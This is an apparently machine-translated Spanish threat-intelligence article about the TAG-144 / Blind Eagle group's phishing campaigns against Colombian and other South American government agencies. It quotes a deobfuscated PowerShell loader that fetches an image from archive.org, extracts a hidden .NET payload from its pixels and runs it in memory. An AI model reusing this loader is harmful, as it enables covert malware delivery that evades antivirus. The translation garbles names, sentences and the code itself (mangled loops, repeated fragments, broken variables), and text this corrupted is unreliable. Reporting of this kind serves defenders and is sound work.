Durante el año pasado, un actor de amenaza sombrío conocido como TAG-144, también rastreado bajo alias Cieg Eagle y Apt-C-36, ha intensificado las operaciones contra las instituciones gubernamentales sudamericanas.
Observado por primera vez en 2018, este grupo ha adoptado una variedad de troyanos de acceso remoto de productos básicos (ratas) como Asyncrat, REMCOS RAT y XWORM, a menudo entregadas a través de campañas de lanza altamente específicas disfrazadas de notificaciones judiciales o fiscales oficiales.
A mediados de 2025, los futuros analistas registraron un aumento significativo en la actividad, con cinco grupos distintos que implementan una nueva infraestructura y explotan servicios legítimos de Internet para organizar las cargas útiles de malware.
El acceso inicial generalmente aprovecha las cuentas de correo electrónico comprometidas o falsificadas de las agencias gubernamentales locales, atrayendo a los usuarios a abrir documentos maliciosos o archivos adjuntos SVG.
Estos archivos adjuntos a menudo contienen JavaScript integrado que, cuando se ejecutan, recupera un cargador de segunda etapa de servicios como Paste.ee o Discord’s CDN.
Investigadores futuros registrados identificado Numerosas direcciones de correo electrónico del gobierno colombiano comprometidos utilizadas para enviar citaciones legales engañosas, ilustrando la capacidad del adversario para combinar la ingeniería social con un subterfugio técnico.
Páginas de phishing vinculadas al clúster 4 (fuente – FUTUTURE RECORDED)
El impacto de las campañas de TAG-144 ha sido más grave en las agencias federales y municipales de Colombia, donde la exfiltración de credenciales y datos confidenciales plantea riesgos de espionaje y extorsión financiera.
A pesar de compartir tácticas centrales en grupos (dominios DNS dinámicos, ratas de código abierto y crypters robados (el uso en evolución del grupo de esteganografía y algoritmos de generación de dominios (DGA) marca un cambio notable hacia operaciones más resistentes.
Los futuros analistas registrados señalaron que esta evolución no solo complica las defensas tradicionales, sino que también subraya la línea borrosa entre el delito cibernético y el espionaje a nivel estatal.
Mecanismo de infección y extracción de carga útil esteganográfica
Una de las técnicas más sofisticadas de TAG-144 implica integrar un ensamblaje de .NET codificado Base64 dentro de los datos de píxeles de una imagen JPEG benigna alojada en el archivo (.) Org.
Carga útil alojada en Archive (.) ORG URL (Fuente – RecordedFuture)
Tras la ejecución del script PowerShell inicial, el cargador escanea para un marcador de byte predefinido antes de extraer e invocar la carga útil directamente en la memoria, omitir las escrituras de disco y evadir la detección de antivirus.
Por ejemplo, el segmento de PowerShell deobfuscado responsable de este proceso aparece como:
$ tormodont = “https://archive.org/download/universe-…/universe.jpg” $ sclere = new-object System.net.webclient $ sclere.headers.add (‘user-agent’, ‘mozilla/5.0’) $ sorority = $ sclere.downloaddata ($ tormodont) # identificador y extracto de embeedetedes y extracto de embeedes y extracto de embeedes y extracto de embeedes y extracto de embeeddata $ splenoncus = $ Sorority ($ MarkerIndex .. ($ Sorority.length – 1)) $ stream = new -object io.memorystream $ stream.write ($ splenoncus, 0, $ splenoncus.length) $ bitmap = (drawing.bitmap) :: fromstream ($ stream) # reconstruir carga de datos de Pixel ($ y en el poseach ($ es en elach ($ es en elach ($ es en elach ($ es en elach ($ y en el poseach ($ y en el paso de los datos ($ y en $. 0 .. ($ bitmap.height-1)) {foreach ($ x en 0 .. ($ bitmap.width-1)) {$ color = $ bitmap.getpixel ($ x, $ y) $ byteslist.add ($ color.r); $ byteslist.add ($ color.g); $ byteslist.add ($ color.b)}} $ payloadbytes = (convert) :: fromBase64String ($ byteslist (4 .. ($ longitud+3)) -Jojo ”) (reflextion.assembly) :: load ($ PayBytes) .EntryPoint.invoke ($ null, $ args)
Esta inyección en memoria, junto con la resolución de dominio dinámico, a menudo servicios de apalancamiento como Duckdns.org y Noip.com, vale que la infraestructura de comando y control de la rata sigue siendo ágil y difícil de rastrear.
Al evitar las descargas ejecutables tradicionales y utilizar la esteganografía, TAG-144 demuestra una comprensión avanzada tanto de la evasión de detección como de la puesta en escena de activos, lo que representa una amenaza persistente para las redes gubernamentales en toda la región.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
